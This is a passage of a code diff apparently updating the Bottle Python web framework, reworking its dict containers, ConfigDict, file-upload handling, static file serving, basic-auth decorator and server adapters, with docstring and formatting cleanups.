v[-1]) for k, v in self.dict.items()) + def allitems(self): return ((k, v) for k, vl in self.dict.items() for v in vl) + iterkeys = keys itervalues = values iteritems = items iterallitems = allitems else: - def values(self): return [v[-1] for v in self.dict.values()] - def items(self): return [(k, v[-1]) for k, v in self.dict.items()] - def iterkeys(self): return self.dict.iterkeys() - def itervalues(self): return (v[-1] for v in self.dict.itervalues()) + + def values(self): + return [v[-1] for v in self.dict.values()] + + def items(self): + return [(k, v[-1]) for k, v in self.dict.items()] + + def iterkeys(self): + return self.dict.iterkeys() + + def itervalues(self): + return (v[-1] for v in self.dict.itervalues()) + def iteritems(self): return ((k, v[-1]) for k, v in self.dict.iteritems()) + def iterallitems(self): return ((k, v) for k, vl in self.dict.iteritems() for v in vl) + def allitems(self): return [(k, v) for k, vl in self.dict.iteritems() for v in vl] def get(self, key, default=None, index=-1, type=None): - ''' Return the most recent value for a key. + """ Return the most recent value for a key. :param default: The default value to be returned if the key is not present or the type conversion fails. @@ -1736,7 +2038,7 @@ class MultiDict(DictMixin): :param type: If defined, this callable is used to cast the value into a specific type. Exception are suppressed and result in the default value to be returned. 
- ''' + """ try: val = self.dict[key][index] return type(val) if type else val @@ -1745,15 +2047,15 @@ class MultiDict(DictMixin): return default def append(self, key, value): - ''' Add a new value to the list of values for this key. ''' + """ Add a new value to the list of values for this key. """ self.dict.setdefault(key, []).append(value) def replace(self, key, value): - ''' Replace the list of values with a single value. ''' + """ Replace the list of values with a single value. """ self.dict[key] = [value] def getall(self, key): - ''' Return a (possibly empty) list of values for a key. ''' + """ Return a (possibly empty) list of values for a key. """ return self.dict.get(key) or [] #: Aliases for WTForms to mimic other multi-dict APIs (Django) @@ -1761,14 +2063,13 @@ class MultiDict(DictMixin): getlist = getall - class FormsDict(MultiDict): - ''' This :class:`MultiDict` subclass is used to store request form data. + """ This :class:`MultiDict` subclass is used to store request form data. Additionally to the normal dict-like item access methods (which return unmodified data as native strings), this container also supports attribute-like access to its values. Attributes are automatically de- or recoded to match :attr:`input_encoding` (default: 'utf8'). Missing - attributes default to an empty string. ''' + attributes default to an empty string. """ #: Encoding used for attribute values. input_encoding = 'utf8' @@ -1777,16 +2078,17 @@ class FormsDict(MultiDict): recode_unicode = True def _fix(self, s, encoding=None): - if isinstance(s, unicode) and self.recode_unicode: # Python 3 WSGI - s = s.encode('latin1') - if isinstance(s, bytes): # Python 2 WSGI + if isinstance(s, unicode) and self.recode_unicode: # Python 3 WSGI + return s.encode('latin1').decode(encoding or self.input_encoding) + elif isinstance(s, bytes): # Python 2 WSGI return s.decode(encoding or self.input_encoding) - return s + else: + return s def decode(self, encoding=None): - ''' Returns a copy with all keys and values de- or recoded to match + """ Returns a copy with all keys and values de- or recoded to match :attr:`input_encoding`. Some libraries (e.g. WTForms) want a - unicode dictionary. ''' + unicode dictionary. """ copy = FormsDict() enc = copy.input_encoding = encoding or self.input_encoding copy.recode_unicode = False @@ -1795,6 +2097,7 @@ class FormsDict(MultiDict): return copy def getunicode(self, name, default=None, encoding=None): + """ Return the value as a unicode string, or the default. 
""" try: return self._fix(self[name], encoding) except (UnicodeError, KeyError): @@ -1815,16 +2118,33 @@ class HeaderDict(MultiDict): self.dict = {} if a or ka: self.update(*a, **ka) - def __contains__(self, key): return _hkey(key) in self.dict - def __delitem__(self, key): del self.dict[_hkey(key)] - def __getitem__(self, key): return self.dict[_hkey(key)][-1] - def __setitem__(self, key, value): self.dict[_hkey(key)] = [str(value)] + def __contains__(self, key): + return _hkey(key) in self.dict + + def __delitem__(self, key): + del self.dict[_hkey(key)] + + def __getitem__(self, key): + return self.dict[_hkey(key)][-1] + + def __setitem__(self, key, value): + self.dict[_hkey(key)] = [value if isinstance(value, unicode) else + str(value)] + def append(self, key, value): - self.dict.setdefault(_hkey(key), []).append(str(value)) - def replace(self, key, value): self.dict[_hkey(key)] = [str(value)] - def getall(self, key): return self.dict.get(_hkey(key)) or [] + self.dict.setdefault(_hkey(key), []).append( + value if isinstance(value, unicode) else str(value)) + + def replace(self, key, value): + self.dict[_hkey(key)] = [value if isinstance(value, unicode) else + str(value)] + + def getall(self, key): + return self.dict.get(_hkey(key)) or [] + def get(self, key, default=None, index=-1): return MultiDict.get(self, _hkey(key), default, index) + def filter(self, names): for name in [_hkey(n) for n in names]: if name in self.dict: @@ -1832,7 +2152,7 @@ class HeaderDict(MultiDict): class WSGIHeaderDict(DictMixin): - ''' This dict-like class wraps a WSGI environ dict and provides convenient + """ This dict-like class wraps a WSGI environ dict and provides convenient access to HTTP_* fields. Keys and values are native strings (2.x bytes or 3.x unicode) and keys are case-insensitive. If the WSGI environment contains non-native string values, these are de- or encoded @@ -1841,7 +2161,7 @@ class WSGIHeaderDict(DictMixin): The API will remain stable even on changes to the relevant PEPs. Currently PEP 333, 444 and 3333 are supported. (PEP 444 is the only one that uses non-native strings.) - ''' + """ #: List of keys that do not have a ``HTTP_`` prefix. cgikeys = ('CONTENT_TYPE', 'CONTENT_LENGTH') @@ -1849,18 +2169,24 @@ class WSGIHeaderDict(DictMixin): self.environ = environ def _ekey(self, key): - ''' Translate header field name to CGI/WSGI environ key. ''' - key = key.replace('-','_').upper() + """ Translate header field name to CGI/WSGI environ key. """ + key = key.replace('-', '_').upper() if key in self.cgikeys: return key return 'HTTP_' + key def raw(self, key, default=None): - ''' Return the header value as is (may be bytes or unicode). ''' + """ Return the header value as is (may be bytes or unicode). """ return self.environ.get(self._ekey(key), default) def __getitem__(self, key): - return tonat(self.environ[self._ekey(key)], 'latin1') + val = self.environ[self._ekey(key)] + if py3k: + if isinstance(val, unicode): + val = val.encode('latin1').decode('utf8') + else: + val = val.decode('utf8') + return val def __setitem__(self, key, value): raise TypeError("%s is read-only." 
% self.__class__) @@ -1871,47 +2197,126 @@ class WSGIHeaderDict(DictMixin): def __iter__(self): for key in self.environ: if key[:5] == 'HTTP_': - yield key[5:].replace('_', '-').title() + yield _hkey(key[5:]) elif key in self.cgikeys: - yield key.replace('_', '-').title() + yield _hkey(key) - def keys(self): return [x for x in self] - def __len__(self): return len(self.keys()) - def __contains__(self, key): return self._ekey(key) in self.environ + def keys(self): + return [x for x in self] + + def __len__(self): + return len(self.keys()) + + def __contains__(self, key): + return self._ekey(key) in self.environ class ConfigDict(dict): - ''' A dict-subclass with some extras: You can access keys like attributes. - Uppercase attributes create new ConfigDicts and act as name-spaces. - Other missing attributes return None. Calling a ConfigDict updates its - values and returns itself. + """ A dict-like configuration storage with additional support for + namespaces, validators, meta-data, on_change listeners and more. + """ - >>> cfg = ConfigDict() - >>> cfg.Namespace.value = 5 - >>> cfg.OtherNamespace(a=1, b=2) - >>> cfg - {'Namespace': {'value': 5}, 'OtherNamespace': {'a': 1, 'b': 2}} - ''' + __slots__ = ('_meta', '_on_change') - def __getattr__(self, key): - if key not in self and key[0].isupper(): - self[key] = ConfigDict() - return self.get(key) + def __init__(self): + self._meta = {} + self._on_change = lambda name, value: None - def __setattr__(self, key, value): - if hasattr(dict, key): - raise AttributeError('Read-only attribute.') - if key in self and self[key] and isinstance(self[key], ConfigDict): - raise AttributeError('Non-empty namespace attribute.') - self[key] = value - - def __delattr__(self, key): - if key in self: del self[key] - - def __call__(self, *a, **ka): - for key, value in dict(*a, **ka).items(): setattr(self, key, value) + def load_module(self, path, squash): + """ Load values from a Python module. + :param squash: Squash nested dicts into namespaces by using + load_dict(), otherwise use update() + Example: load_config('my.app.settings', True) + Example: load_config('my.app.settings', False) + """ + config_obj = __import__(path) + obj = dict([(key, getattr(config_obj, key)) + for key in dir(config_obj) if key.isupper()]) + if squash: + self.load_dict(obj) + else: + self.update(obj) return self + def load_config(self, filename): + """ Load values from an ``*.ini`` style config file. + + If the config file contains sections, their names are used as + namespaces for the values within. The two special sections + ``DEFAULT`` and ``bottle`` refer to the root namespace (no prefix). + """ + conf = ConfigParser() + conf.read(filename) + for section in conf.sections(): + for key, value in conf.items(section): + if section not in ('DEFAULT', 'bottle'): + key = section + '.' + key + self[key] = value + return self + + def load_dict(self, source, namespace=''): + """ Load values from a dictionary structure. Nesting can be used to + represent namespaces. + + >>> c = ConfigDict() + >>> c.load_dict({'some': {'namespace': {'key': 'value'} } }) + {'some.namespace.key': 'value'} + """ + for key, value in source.items(): + if isinstance(key, basestring): + nskey = (namespace + '.' 
+ key).strip('.') + if isinstance(value, dict): + self.load_dict(value, namespace=nskey) + else: + self[nskey] = value + else: + raise TypeError('Key has type %r (not a string)' % type(key)) + return self + + def update(self, *a, **ka): + """ If the first parameter is a string, all keys are prefixed with this + namespace. Apart from that it works just as the usual dict.update(). + Example: ``update('some.namespace', key='value')`` """ + prefix = '' + if a and isinstance(a[0], basestring): + prefix = a[0].strip('.') + '.' + a = a[1:] + for key, value in dict(*a, **ka).items(): + self[prefix + key] = value + + def setdefault(self, key, value): + if key not in self: + self[key] = value + return self[key] + + def __setitem__(self, key, value): + if not isinstance(key, basestring): + raise TypeError('Key has type %r (not a string)' % type(key)) + value = self.meta_get(key, 'filter', lambda x: x)(value) + if key in self and self[key] is value: + return + self._on_change(key, value) + dict.__setitem__(self, key, value) + + def __delitem__(self, key): + self._on_change(key, None) + dict.__delitem__(self, key) + + def meta_get(self, key, metafield, default=None): + """ Return the value of a meta field for a key. """ + return self._meta.get(key, {}).get(metafield, default) + + def meta_set(self, key, metafield, value): + """ Set the meta field for a key to a new value. This triggers the + on-change handler for existing keys. """ + self._meta.setdefault(key, {})[metafield] = value + if key in self: + self[key] = self[key] + + def meta_list(self, key): + """ Return an iterable of meta field names defined for a key. """ + return self._meta.get(key, {}).keys() + class AppStack(list): """ A stack-like list. Calling it returns the head of the stack. """ @@ -1929,8 +2334,7 @@ class AppStack(list): class WSGIFileWrapper(object): - - def __init__(self, fp, buffer_size=1024*64): + def __init__(self, fp, buffer_size=1024 * 64): self.fp, self.buffer_size = fp, buffer_size for attr in ('fileno', 'close', 'read', 'readlines', 'tell', 'seek'): if hasattr(fp, attr): setattr(self, attr, getattr(fp, attr)) @@ -1943,23 +2347,34 @@ class WSGIFileWrapper(object): yield part -class _iterchain(itertools.chain): - ''' This only exists to be able to attach a .close method to iterators that - do not support attribute assignment (most of itertools). ''' +class _closeiter(object): + """ This only exists to be able to attach a .close method to iterators that + do not support attribute assignment (most of itertools). """ + + def __init__(self, iterator, close=None): + self.iterator = iterator + self.close_callbacks = makelist(close) + + def __iter__(self): + return iter(self.iterator) + + def close(self): + for func in self.close_callbacks: + func() class ResourceManager(object): - ''' This class manages a list of search paths and helps to find and open + """ This class manages a list of search paths and helps to find and open application-bound resources (files). :param base: default value for :meth:`add_path` calls. :param opener: callable used to open resources. :param cachemode: controls which lookups are cached. One of 'all', 'found' or 'none'. - ''' + """ def __init__(self, base='./', opener=open, cachemode='all'): - self.opener = open + self.opener = opener self.base = base self.cachemode = cachemode @@ -1969,7 +2384,7 @@ class ResourceManager(object): self.cache = {} def add_path(self, path, base=None, index=None, create=False): - ''' Add a new path to the list of search paths. 
Return False if the + """ Add a new path to the list of search paths. Return False if the path does not exist. :param path: The new search path. Relative paths are turned into @@ -1984,7 +2399,7 @@ class ResourceManager(object): along with a python module or package:: res.add_path('./resources/', __file__) - ''' + """ base = os.path.abspath(os.path.dirname(base or self.base)) path = os.path.abspath(os.path.join(base, os.path.dirname(path))) path += os.sep @@ -2000,7 +2415,7 @@ class ResourceManager(object): return os.path.exists(path) def __iter__(self): - ''' Iterate over all existing files in all registered paths. ''' + """ Iterate over all existing files in all registered paths. """ search = self.path[:] while search: path = search.pop() @@ -2011,11 +2426,11 @@ class ResourceManager(object): else: yield full def lookup(self, name): - ''' Search for a resource and return an absolute file path, or `None`. + """ Search for a resource and return an absolute file path, or `None`. The :attr:`path` list is searched in order. The first match is returend. Symlinks are followed. The result is cached to speed up - future lookups. ''' + future lookups. """ if name not in self.cache or DEBUG: for path in self.path: fpath = os.path.join(path, name) @@ -2028,22 +2443,80 @@ class ResourceManager(object): return self.cache[name] def open(self, name, mode='r', *args, **kwargs): - ''' Find a resource and return a file object, or raise IOError. ''' + """ Find a resource and return a file object, or raise IOError. """ fname = self.lookup(name) if not fname: raise IOError("Resource %r not found." % name) - return self.opener(name, mode=mode, *args, **kwargs) + return self.opener(fname, mode=mode, *args, **kwargs) +class FileUpload(object): + def __init__(self, fileobj, name, filename, headers=None): + """ Wrapper for file uploads. """ + #: Open file(-like) object (BytesIO buffer or temporary file) + self.file = fileobj + #: Name of the upload form field + self.name = name + #: Raw filename as sent by the client (may contain unsafe characters) + self.raw_filename = filename + #: A :class:`HeaderDict` with additional headers (e.g. content-type) + self.headers = HeaderDict(headers) if headers else HeaderDict() + content_type = HeaderProperty('Content-Type') + content_length = HeaderProperty('Content-Length', reader=int, default=-1) + @cached_property + def filename(self): + """ Name of the file on the client file system, but normalized to ensure + file system compatibility. An empty filename is returned as 'empty'. + Only ASCII letters, digits, dashes, underscores and dots are + allowed in the final filename. Accents are removed, if possible. + Whitespace is replaced by a single dash. Leading or tailing dots + or dashes are removed. The filename is limited to 255 characters. 
+ """ + fname = self.raw_filename + if not isinstance(fname, unicode): + fname = fname.decode('utf8', 'ignore') + fname = normalize('NFKD', fname) + fname = fname.encode('ASCII', 'ignore').decode('ASCII') + fname = os.path.basename(fname.replace('\\', os.path.sep)) + fname = re.sub(r'[^a-zA-Z0-9-_.\s]', '', fname).strip() + fname = re.sub(r'[-\s]+', '-', fname).strip('.-') + return fname[:255] or 'empty' + + def _copy_file(self, fp, chunk_size=2 ** 16): + read, write, offset = self.file.read, fp.write, self.file.tell() + while 1: + buf = read(chunk_size) + if not buf: break + write(buf) + self.file.seek(offset) + + def save(self, destination, overwrite=False, chunk_size=2 ** 16): + """ Save file to disk or copy its content to an open file(-like) object. + If *destination* is a directory, :attr:`filename` is added to the + path. Existing files are not overwritten by default (IOError). + + :param destination: File path, directory or file(-like) object. + :param overwrite: If True, replace existing files. (default: False) + :param chunk_size: Bytes to read at a time. (default: 64kb) + """ + if isinstance(destination, basestring): # Except file-likes here + if os.path.isdir(destination): + destination = os.path.join(destination, self.filename) + if not overwrite and os.path.exists(destination): + raise IOError('File exists.') + with open(destination, 'wb') as fp: + self._copy_file(fp, chunk_size) + else: + self._copy_file(destination, chunk_size) ############################################################################### # Application Helper ########################################################### ############################################################################### -def abort(code=500, text='Unknown Error: Application stopped.'): +def abort(code=500, text='Unknown Error.'): """ Aborts execution and causes a HTTP error. """ raise HTTPError(code, text) @@ -2051,14 +2524,17 @@ def abort(code=500, text='Unknown Error: Application stopped.'): def redirect(url, code=None): """ Aborts execution and causes a 303 or 302 redirect, depending on the HTTP protocol version. """ - if code is None: + if not code: code = 303 if request.get('SERVER_PROTOCOL') == "HTTP/1.1" else 302 - location = urljoin(request.url, url) - raise HTTPResponse("", status=code, Location=location) + res = response.copy(cls=HTTPResponse) + res.status = code + res.body = "" + res.set_header('Location', urljoin(request.url, url)) + raise res -def _file_iter_range(fp, offset, bytes, maxread=1024*1024): - ''' Yield chunks from a range in a file. No chunk is bigger than maxread.''' +def _file_iter_range(fp, offset, bytes, maxread=1024 * 1024): + """ Yield chunks from a range in a file. No chunk is bigger than maxread.""" fp.seek(offset) while bytes > 0: part = fp.read(min(bytes, maxread)) @@ -2067,12 +2543,29 @@ def _file_iter_range(fp, offset, bytes, maxread=1024*1024): yield part -def static_file(filename, root, mimetype='auto', download=False): +def static_file(filename, root, + mimetype='auto', + download=False, + charset='UTF-8'): """ Open a file in a safe way and return :exc:`HTTPResponse` with status - code 200, 305, 401 or 404. Set Content-Type, Content-Encoding, - Content-Length and Last-Modified header. Obey If-Modified-Since header - and HEAD requests. + code 200, 305, 403 or 404. The ``Content-Type``, ``Content-Encoding``, + ``Content-Length`` and ``Last-Modified`` headers are set if possible. + Special support for ``If-Modified-Since``, ``Range`` and ``HEAD`` + requests. 
+ + :param filename: Name or path of the file to send. + :param root: Root path for file lookups. Should be an absolute directory + path. + :param mimetype: Defines the content-type header (default: guess from + file extension) + :param download: If True, ask the browser to open a `Save as...` dialog + instead of opening the file with the associated program. You can + specify a custom filename as a string. If not specified, the + original filename is used (default: False). + :param charset: The charset to use for files with a ``text/*`` + mime-type. (default: UTF-8) """ + root = os.path.abspath(root) + os.sep filename = os.path.abspath(os.path.join(root, filename.strip('/\\'))) headers = dict() @@ -2085,10 +2578,15 @@ def static_file(filename, root, mimetype='auto', download=False): return HTTPError(403, "You do not have permission to access this file.") if mimetype == 'auto': - mimetype, encoding = mimetypes.guess_type(filename) - if mimetype: headers['Content-Type'] = mimetype + if download and download != True: + mimetype, encoding = mimetypes.guess_type(download) + else: + mimetype, encoding = mimetypes.guess_type(filename) if encoding: headers['Content-Encoding'] = encoding - elif mimetype: + + if mimetype: + if mimetype[:5] == 'text/' and charset and 'charset' not in mimetype: + mimetype += '; charset=%s' % charset headers['Content-Type'] = mimetype if download: @@ -2104,7 +2602,8 @@ def static_file(filename, root, mimetype='auto', download=False): if ims: ims = parse_date(ims.split(";")[0].strip()) if ims is not None and ims >= int(stats.st_mtime): - headers['Date'] = time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime()) + headers['Date'] = time.strftime("%a, %d %b %Y %H:%M:%S GMT", + time.gmtime()) return HTTPResponse(status=304, **headers) body = '' if request.method == 'HEAD' else open(filename, 'rb') @@ -2116,17 +2615,12 @@ def static_file(filename, root, mimetype='auto', download=False): if not ranges: return HTTPError(416, "Requested Range Not Satisfiable") offset, end = ranges[0] - headers["Content-Range"] = "bytes %d-%d/%d" % (offset, end-1, clen) - headers["Content-Length"] = str(end-offset) - if body: body = _file_iter_range(body, offset, end-offset) + headers["Content-Range"] = "bytes %d-%d/%d" % (offset, end - 1, clen) + headers["Content-Length"] = str(end - offset) + if body: body = _file_iter_range(body, offset, end - offset) return HTTPResponse(body, status=206, **headers) return HTTPResponse(body, **headers) - - - - - ############################################################################### # HTTP Utilities and MISC (TODO) ############################################### ############################################################################### @@ -2136,14 +2630,25 @@ def debug(mode=True): """ Change the debug level. There is only one debug level supported at the moment.""" global DEBUG + if mode: warnings.simplefilter('default') DEBUG = bool(mode) +def http_date(value): + if isinstance(value, (datedate, datetime)): + value = value.utctimetuple() + elif isinstance(value, (int, float)): + value = time.gmtime(value) + if not isinstance(value, basestring): + value = time.strftime("%a, %d %b %Y %H:%M:%S GMT", value) + return value + + def parse_date(ims): """ Parse rfc1123, rfc850 and asctime timestamps and return UTC epoch. 
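The new http_date() helper and parse_date() are roughly inverses of each other; a small sketch (the epoch value is arbitrary):

    from bottle import http_date, parse_date

    stamp = 1456531200                # arbitrary UTC epoch value
    text = http_date(stamp)           # e.g. 'Sat, 27 Feb 2016 00:00:00 GMT'
    parse_date(text)                  # back to the same epoch, as a float
    parse_date('not a timestamp')     # unparsable input returns None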
""" try: ts = email.utils.parsedate_tz(ims) - return time.mktime(ts[:8] + (0,)) - (ts[9] or 0) - time.timezone + return time.mktime(ts[:8] + (0, )) - (ts[9] or 0) - time.timezone except (TypeError, ValueError, IndexError, OverflowError): return None @@ -2153,32 +2658,34 @@ def parse_auth(header): try: method, data = header.split(None, 1) if method.lower() == 'basic': - user, pwd = touni(base64.b64decode(tob(data))).split(':',1) + user, pwd = touni(base64.b64decode(tob(data))).split(':', 1) return user, pwd except (KeyError, ValueError): return None + def parse_range_header(header, maxlen=0): - ''' Yield (start, end) ranges parsed from a HTTP Range header. Skip - unsatisfiable ranges. The end index is non-inclusive.''' + """ Yield (start, end) ranges parsed from a HTTP Range header. Skip + unsatisfiable ranges. The end index is non-inclusive.""" if not header or header[:6] != 'bytes=': return ranges = [r.split('-', 1) for r in header[6:].split(',') if '-' in r] for start, end in ranges: try: if not start: # bytes=-100 -> last 100 bytes - start, end = max(0, maxlen-int(end)), maxlen + start, end = max(0, maxlen - int(end)), maxlen elif not end: # bytes=100- -> all but the first 99 bytes start, end = int(start), maxlen - else: # bytes=100-200 -> bytes 100-200 (inclusive) - start, end = int(start), min(int(end)+1, maxlen) + else: # bytes=100-200 -> bytes 100-200 (inclusive) + start, end = int(start), min(int(end) + 1, maxlen) if 0 <= start < end <= maxlen: yield start, end except ValueError: pass + def _parse_qsl(qs): r = [] - for pair in qs.replace(';','&').split('&'): + for pair in qs.replace(';', '&').split('&'): if not pair: continue nv = pair.split('=', 1) if len(nv) != 2: nv.append('') @@ -2187,21 +2694,23 @@ def _parse_qsl(qs): r.append((key, value)) return r + def _lscmp(a, b): - ''' Compares two strings in a cryptographically safe way: - Runtime is not affected by length of common prefix. ''' - return not sum(0 if x==y else 1 for x, y in zip(a, b)) and len(a) == len(b) + """ Compares two strings in a cryptographically safe way: + Runtime is not affected by length of common prefix. """ + return not sum(0 if x == y else 1 + for x, y in zip(a, b)) and len(a) == len(b) def cookie_encode(data, key): - ''' Encode and sign a pickle-able object. Return a (byte) string ''' + """ Encode and sign a pickle-able object. Return a (byte) string """ msg = base64.b64encode(pickle.dumps(data, -1)) sig = base64.b64encode(hmac.new(tob(key), msg).digest()) return tob('!') + sig + tob('?') + msg def cookie_decode(data, key): - ''' Verify and decode an encoded string. Return an object or None.''' + """ Verify and decode an encoded string. Return an object or None.""" data = tob(data) if cookie_is_encoded(data): sig, msg = data.split(tob('?'), 1) @@ -2211,20 +2720,20 @@ def cookie_decode(data, key): def cookie_is_encoded(data): - ''' Return True if the argument looks like a encoded cookie.''' + """ Return True if the argument looks like a encoded cookie.""" return bool(data.startswith(tob('!')) and tob('?') in data) def html_escape(string): - ''' Escape HTML special characters ``&<>`` and quotes ``'"``. ''' - return string.replace('&','&').replace('<','<').replace('>','>')\ - .replace('"','"').replace("'",''') + """ Escape HTML special characters ``&<>`` and quotes ``'"``. 
""" + return string.replace('&', '&').replace('<', '<').replace('>', '>')\ + .replace('"', '"').replace("'", ''') def html_quote(string): - ''' Escape and quote a string to be used as an HTTP attribute.''' - return '"%s"' % html_escape(string).replace('\n','%#10;')\ - .replace('\r',' ').replace('\t',' ') + """ Escape and quote a string to be used as an HTTP attribute.""" + return '"%s"' % html_escape(string).replace('\n', ' ')\ + .replace('\r', ' ').replace('\t', ' ') def yieldroutes(func): @@ -2233,40 +2742,39 @@ def yieldroutes(func): takes optional keyword arguments. The output is best described by example:: a() -> '/a' - b(x, y) -> '/b/:x/:y' - c(x, y=5) -> '/c/:x' and '/c/:x/:y' - d(x=5, y=6) -> '/d' and '/d/:x' and '/d/:x/:y' + b(x, y) -> '/b/<x>/<y>' + c(x, y=5) -> '/c/<x>' and '/c/<x>/<y>' + d(x=5, y=6) -> '/d' and '/d/<x>' and '/d/<x>/<y>' """ - import inspect # Expensive module. Only import if necessary. - path = '/' + func.__name__.replace('__','/').lstrip('/') - spec = inspect.getargspec(func) + path = '/' + func.__name__.replace('__', '/').lstrip('/') + spec = getargspec(func) argc = len(spec[0]) - len(spec[3] or []) - path += ('/:%s' * argc) % tuple(spec[0][:argc]) + path += ('/<%s>' * argc) % tuple(spec[0][:argc]) yield path for arg in spec[0][argc:]: - path += '/:%s' % arg + path += '/<%s>' % arg yield path def path_shift(script_name, path_info, shift=1): - ''' Shift path fragments from PATH_INFO to SCRIPT_NAME and vice versa. + """ Shift path fragments from PATH_INFO to SCRIPT_NAME and vice versa. :return: The modified paths. :param script_name: The SCRIPT_NAME path. :param script_name: The PATH_INFO path. :param shift: The number of path fragments to shift. May be negative to change the shift direction. (default: 1) - ''' + """ if shift == 0: return script_name, path_info pathlist = path_info.strip('/').split('/') scriptlist = script_name.strip('/').split('/') if pathlist and pathlist[0] == '': pathlist = [] if scriptlist and scriptlist[0] == '': scriptlist = [] - if shift > 0 and shift <= len(pathlist): + if 0 < shift <= len(pathlist): moved = pathlist[:shift] scriptlist = scriptlist + moved pathlist = pathlist[shift:] - elif shift < 0 and shift >= -len(scriptlist): + elif 0 > shift >= -len(scriptlist): moved = scriptlist[shift:] pathlist = moved + pathlist scriptlist = scriptlist[:shift] @@ -2279,56 +2787,45 @@ def path_shift(script_name, path_info, shift=1): return new_script_name, new_path_info -def validate(**vkargs): - """ - Validates and manipulates keyword arguments by user defined callables. - Handles ValueError and missing arguments by raising HTTPError(403). - """ - depr('Use route wildcard filters instead.') - def decorator(func): - @functools.wraps(func) - def wrapper(*args, **kargs): - for key, value in vkargs.items(): - if key not in kargs: - abort(403, 'Missing parameter: %s' % key) - try: - kargs[key] = value(kargs[key]) - except ValueError: - abort(403, 'Wrong parameter format for: %s' % key) - return func(*args, **kargs) - return wrapper - return decorator - - def auth_basic(check, realm="private", text="Access denied"): - ''' Callback decorator to require HTTP auth (basic). - TODO: Add route(check_auth=...) parameter. 
''' - def decorator(func): - def wrapper(*a, **ka): - user, password = request.auth or (None, None) - if user is None or not check(user, password): - response.headers['WWW-Authenticate'] = 'Basic realm="%s"' % realm - return HTTPError(401, text) - return func(*a, **ka) - return wrapper - return decorator + """ Callback decorator to require HTTP auth (basic). + TODO: Add route(check_auth=...) parameter. """ + def decorator(func): + + @functools.wraps(func) + def wrapper(*a, **ka): + user, password = request.auth or (None, None) + if user is None or not check(user, password): + err = HTTPError(401, text) + err.add_header('WWW-Authenticate', 'Basic realm="%s"' % realm) + return err + return func(*a, **ka) + + return wrapper + + return decorator # Shortcuts for common Bottle methods. # They all refer to the current default application. + def make_default_app_wrapper(name): - ''' Return a callable that relays calls to the current default app. ''' + """ Return a callable that relays calls to the current default app. """ + @functools.wraps(getattr(Bottle, name)) def wrapper(*a, **ka): return getattr(app(), name)(*a, **ka) + return wrapper + route = make_default_app_wrapper('route') get = make_default_app_wrapper('get') post = make_default_app_wrapper('post') put = make_default_app_wrapper('put') delete = make_default_app_wrapper('delete') +patch = make_default_app_wrapper('patch') error = make_default_app_wrapper('error') mount = make_default_app_wrapper('mount') hook = make_default_app_wrapper('hook') @@ -2336,12 +2833,6 @@ install = make_default_app_wrapper('install') uninstall = make_default_app_wrapper('uninstall') url = make_default_app_wrapper('get_url') - - - - - - ############################################################################### # Server Adapter ############################################################### ############################################################################### @@ -2349,51 +2840,93 @@ url = make_default_app_wrapper('get_url') class ServerAdapter(object): quiet = False - def __init__(self, host='127.0.0.1', port=8080, **config): - self.options = config + + def __init__(self, host='127.0.0.1', port=8080, **options): + self.options = options self.host = host self.port = int(port) - def run(self, handler): # pragma: no cover + def run(self, handler): # pragma: no cover pass def __repr__(self): - args = ', '.join(['%s=%s'%(k,repr(v)) for k, v in self.options.items()]) + args = ', '.join(['%s=%s' % (k, repr(v)) + for k, v in self.options.items()]) return "%s(%s)" % (self.__class__.__name__, args) class CGIServer(ServerAdapter): quiet = True - def run(self, handler): # pragma: no cover + + def run(self, handler): # pragma: no cover from wsgiref.handlers import CGIHandler + def fixed_environ(environ, start_response): environ.setdefault('PATH_INFO', '') return handler(environ, start_response) + CGIHandler().run(fixed_environ) class FlupFCGIServer(ServerAdapter): - def run(self, handler): # pragma: no cover + def run(self, handler): # pragma: no cover import flup.server.fcgi self.options.setdefault('bindAddress', (self.host, self.port)) flup.server.fcgi.WSGIServer(handler, **self.options).run() class WSGIRefServer(ServerAdapter): - def run(self, handler): # pragma: no cover - from wsgiref.simple_server import make_server, WSGIRequestHandler - if self.quiet: - class QuietHandler(WSGIRequestHandler): - def log_request(*args, **kw): pass - self.options['handler_class'] = QuietHandler - srv = make_server(self.host, self.port, handler, **self.options) - 
srv.serve_forever() + def run(self, app): # pragma: no cover + from wsgiref.simple_server import make_server + from wsgiref.simple_server import WSGIRequestHandler, WSGIServer + import socket + + class FixedHandler(WSGIRequestHandler): + def address_string(self): # Prevent reverse DNS lookups please. + return self.client_address[0] + + def log_request(*args, **kw): + if not self.quiet: + return WSGIRequestHandler.log_request(*args, **kw) + + handler_cls = self.options.get('handler_class', FixedHandler) + server_cls = self.options.get('server_class', WSGIServer) + + if ':' in self.host: # Fix wsgiref for IPv6 addresses. + if getattr(server_cls, 'address_family') == socket.AF_INET: + + class server_cls(server_cls): + address_family = socket.AF_INET6 + + self.srv = make_server(self.host, self.port, app, server_cls, + handler_cls) + self.port = self.srv.server_port # update port actual port (0 means random) + try: + self.srv.serve_forever() + except KeyboardInterrupt: + self.srv.server_close() # Prevent ResourceWarning: unclosed socket + raise class CherryPyServer(ServerAdapter): - def run(self, handler): # pragma: no cover + def run(self, handler): # pragma: no cover from cherrypy import wsgiserver - server = wsgiserver.CherryPyWSGIServer((self.host, self.port), handler) + self.options['bind_addr'] = (self.host, self.port) + self.options['wsgi_app'] = handler + + certfile = self.options.get('certfile') + if certfile: + del self.options['certfile'] + keyfile = self.options.get('keyfile') + if keyfile: + del self.options['keyfile'] + + server = wsgiserver.CherryPyWSGIServer(**self.options) + if certfile: + server.ssl_certificate = certfile + if keyfile: + server.ssl_private_key = keyfile + try: server.start() finally: @@ -2403,17 +2936,17 @@ class CherryPyServer(ServerAdapter): class WaitressServer(ServerAdapter): def run(self, handler): from waitress import serve - serve(handler, host=self.host, port=self.port) + serve(handler, host=self.host, port=self.port, _quiet=self.quiet) class PasteServer(ServerAdapter): - def run(self, handler): # pragma: no cover + def run(self, handler): # pragma: no cover from paste import httpserver - if not self.quiet: - from paste.translogger import TransLogger - handler = TransLogger(handler) - httpserver.serve(handler, host=self.host, port=str(self.port), - **self.options) + from paste.translogger import TransLogger + handler = TransLogger(handler, setup_console_handler=(not self.quiet)) + httpserver.serve(handler, + host=self.host, + port=str(self.port), **self.options) class MeinheldServer(ServerAdapter): @@ -2425,7 +2958,8 @@ class MeinheldServer(ServerAdapter): class FapwsServer(ServerAdapter): """ Extremely fast webserver using libev. See http://www.fapws.org/ """ - def run(self, handler): # pragma: no cover + + def run(self, handler): # pragma: no cover import fapws._evwsgi as evwsgi from fapws import base, config port = self.port @@ -2438,26 +2972,30 @@ class FapwsServer(ServerAdapter): _stderr("WARNING: Auto-reloading does not work with 